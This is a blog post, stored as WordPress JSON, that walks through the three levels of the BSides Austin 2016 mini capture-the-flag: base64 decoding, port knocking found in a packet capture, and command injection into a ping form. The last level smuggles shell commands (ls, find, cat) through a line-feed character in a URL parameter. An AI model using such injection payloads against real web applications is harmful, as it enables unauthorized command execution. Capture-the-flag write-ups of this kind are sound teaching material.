{"id":650,"date":"2016-04-04T11:34:32","date_gmt":"2016-04-04T16:34:32","guid":{"rendered":"http:\/\/www.webadminblog.com\/?p=650"},"modified":"2016-04-04T11:45:32","modified_gmt":"2016-04-04T16:45:32","slug":"completing-the-bsides-austin-2016-mini-ctf","status":"publish","type":"post","link":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/","title":{"rendered":"Completing the BSides Austin 2016 Mini-CTF"},"content":{"rendered":"

The BSides Austin 2016 Mini-CTF began with the back of the badge. \u00a0There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers\u00a0\u201c07263584\u201d. \u00a0Not very useful. \u00a0Below that, however, there was \u00a0a string of letters and numbers as follows:<\/p>\n

aHR0cDovL2N0Zi5ic2lkZXNhdXN0aW4ub3JnL2xldmVsMS8=<\/em><\/p>\n

The string very obviously looked like BASE64 so I decoded it to get the following URL:<\/div>\n

http:\/\/ctf.bsidesaustin.org\/level1\/<\/a><\/p>\n

On that page it reads:<\/div>\n
<\/div>\n
<\/div>\n

That start was easy! You have shown that you are curious and that is the key. As your reward, you may have this:flag 1: BSides{D3c0d3s_R_3Z}Do you want to play some more? If so, read on…<\/p>\n

1. Turn in flags by sending an email to bsidesaustin@gmail.com<\/a>. The email must contain your name, email address, and the flag you are turning in<\/p>\n

2. There are three flags total, each should be submitted via email.<\/p>\n

3. Do not scan this server with automated tools. They are not necessary and could cause performance issues. If you scan this server, you could be disqualified.<\/p>\n

4. Send in flag 1 then click here<\/a> to continue…<\/p>\n

I submitted the flag and moved on to the next page at:<\/div>\n
<\/div>\n
<\/div>\n

http:\/\/ctf.bsidesaustin.org\/level2\/9slfowiuwer98987987kljsdfljsdf\/<\/a><\/p>\n

<\/div>\n
On that page there was a file named coms.pcap. \u00a0With the \u201cpcap\u201d extension, I went ahead and loaded up into Wireshark. \u00a0It was a 1113 line packet capture file with encrypted Google traffic, YouTube rick rolls, and more. \u00a0Only a handful of the requests were for 45.32.195.232, the IP address belonging to ctf.bsidesaustin.org. \u00a0When I followed the TCP stream, it was for a request to http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html<\/a>. \u00a0When I went to that URL, however, it was as if nothing was listening. \u00a0Eventually, I filtered the pcap by that IP as the destination and found a sequence of requests to that IP at odd ports\u20261025\u20262300\u20261337\u20261337. \u00a0This smelled suspiciously of port knocking so I wrote a quick bash script using nmap to test it out:<\/div>\n
<\/div>\n
<\/div>\n

for x in 1025 2300 1337; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 45.32.195.232; done<\/p>\n

<\/div>\n
Finally, I hit the page on port 31337:<\/div>\n
<\/div>\n
<\/div>\n

http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html<\/a><\/p>\n

<\/div>\n
Sure enough, now I get a response that says:<\/div>\n
<\/div>\n
<\/div>\n

Congratulations, you have completed the second challenge!The second flag is: BSidesAustin{C4rV1NG_UP_PC4Ps}<\/p>\n

Click here<\/a> to continue to the final challenge!<\/p>\n

<\/div>\n
I submitted the flag and moved on to the next page at:<\/div>\n
<\/div>\n
<\/div>\n

http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu<\/a><\/p>\n

<\/div>\n
On this page we see a network interface test where you can specify an IP as a ping destination, and when you hit \u201cEnter\u201d, it gives you the results of the ping:<\/div>\n
<\/div>\n
<\/div>\n

PING\u00a0127.0.0.1\u00a0(127.0.0.1)\u00a056(84)\u00a0bytes\u00a0of\u00a0data.
\n64\u00a0bytes\u00a0from\u00a0127.0.0.1:\u00a0icmp_seq=1\u00a0ttl=64\u00a0time=0.026\u00a0ms—\u00a0127.0.0.1\u00a0ping\u00a0statistics\u00a0—
\n1\u00a0packets\u00a0transmitted,\u00a01\u00a0received,\u00a00%\u00a0packet\u00a0loss,\u00a0time\u00a00ms<\/p>\n

rtt\u00a0min\/avg\/max\/mdev\u00a0=\u00a00.026\/0.026\/0.026\/0.000\u00a0ms<\/p>\n

<\/div>\n
Entering some non-IP address information, I got a message like:<\/div>\n
<\/div>\n
<\/div>\n

Error\u00a0running\u00a0ping\u00a0-c\u00a01\u00a0127.0.0.1<\/p>\n

<\/div>\n
So, there is some filtering on it, but it also looks like some data is making it through. \u00a0I figured out that I could specify the destination as a GET instead of the POST with by adding \u201c?dest=127.0.0.1\u201d to the URL and that worked.\u00a0 I tried a bunch of different combinations of \u201c;\u201d, \u201c&&\u201d, and other OS command functions that would piggyback on the existing function with no luck. \u00a0Eventually, I figured out that \u201c%0A\u201d, the ASCII line feed control character, was not filtered and I could use that to run more commands. \u00a0For example:<\/div>\n
<\/div>\n
<\/div>\n

http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0ls<\/a><\/p>\n

<\/div>\n
Returned a listing of \u201cindex.cgi\u201d and \u201cthe\u201d in that directory. \u00a0Then:<\/div>\n
<\/div>\n
<\/div>\n

http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0find<\/a><\/p>\n

<\/div>\n
Showed that \u201cthe\u201d actually expanded to \u201c\/the\/roof\/the\/roof\/the\/roof\/is\/on\/fire\/flag.txt\u201d. \u00a0Sweet! \u00a0I found the flag! \u00a0Now to open it.<\/div>\n
<\/div>\n
<\/div>\n

http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Acat%3C.\/the\/roof\/the\/roof\/the\/roof\/is\/on\/fire\/flag.txt<\/a><\/p>\n

<\/div>\n
That returned:<\/div>\n
<\/div>\n
<\/div>\n

PING\u00a0127.0.0.1\u00a0(127.0.0.1)\u00a056(84)\u00a0bytes\u00a0of\u00a0data.
\n64\u00a0bytes\u00a0from\u00a0127.0.0.1:\u00a0icmp_seq=1\u00a0ttl=64\u00a0time=0.026\u00a0ms—\u00a0127.0.0.1\u00a0ping\u00a0statistics\u00a0—
\n1\u00a0packets\u00a0transmitted,\u00a01\u00a0received,\u00a00%\u00a0packet\u00a0loss,\u00a0time\u00a00ms
\nrtt\u00a0min\/avg\/max\/mdev\u00a0=\u00a00.026\/0.026\/0.026\/0.000\u00a0ms
\nGreat\u00a0job!\u00a0The\u00a0third\u00a0and\u00a0final\u00a0flag\u00a0is:BSidesAustin{F1lt3rs_R_Fun}<\/p>\n

Congratulations,\u00a0you\u00a0have\u00a0completed\u00a0the\u00a0challenge!<\/p>\n

<\/div>\n
Final flag submitted. \u00a0Game over!<\/div>\n","protected":false},"excerpt":{"rendered":"

The BSides Austin 2016 Mini-CTF began with the back of the badge. \u00a0There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers\u00a0\u201c07263584\u201d. \u00a0Not very useful. \u00a0Below that, however, there was \u00a0a string of letters and […]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[645,517],"tags":[646,423,521,518,519,648,647],"class_list":["post-650","post","type-post","status-publish","format-standard","hentry","category-bsides-austin-2016","category-capture-the-flag","tag-646","tag-austin","tag-bsides","tag-capture","tag-flag","tag-mini-ctf","tag-the"],"aioseo_notices":[],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/pfI0c-au","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/comments?post=650"}],"version-history":[{"count":8,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650\/revisions"}],"predecessor-version":[{"id":658,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650\/revisions\/658"}],"wp:attachment":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/media?parent=650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/categories?post=650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/tags?post=650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}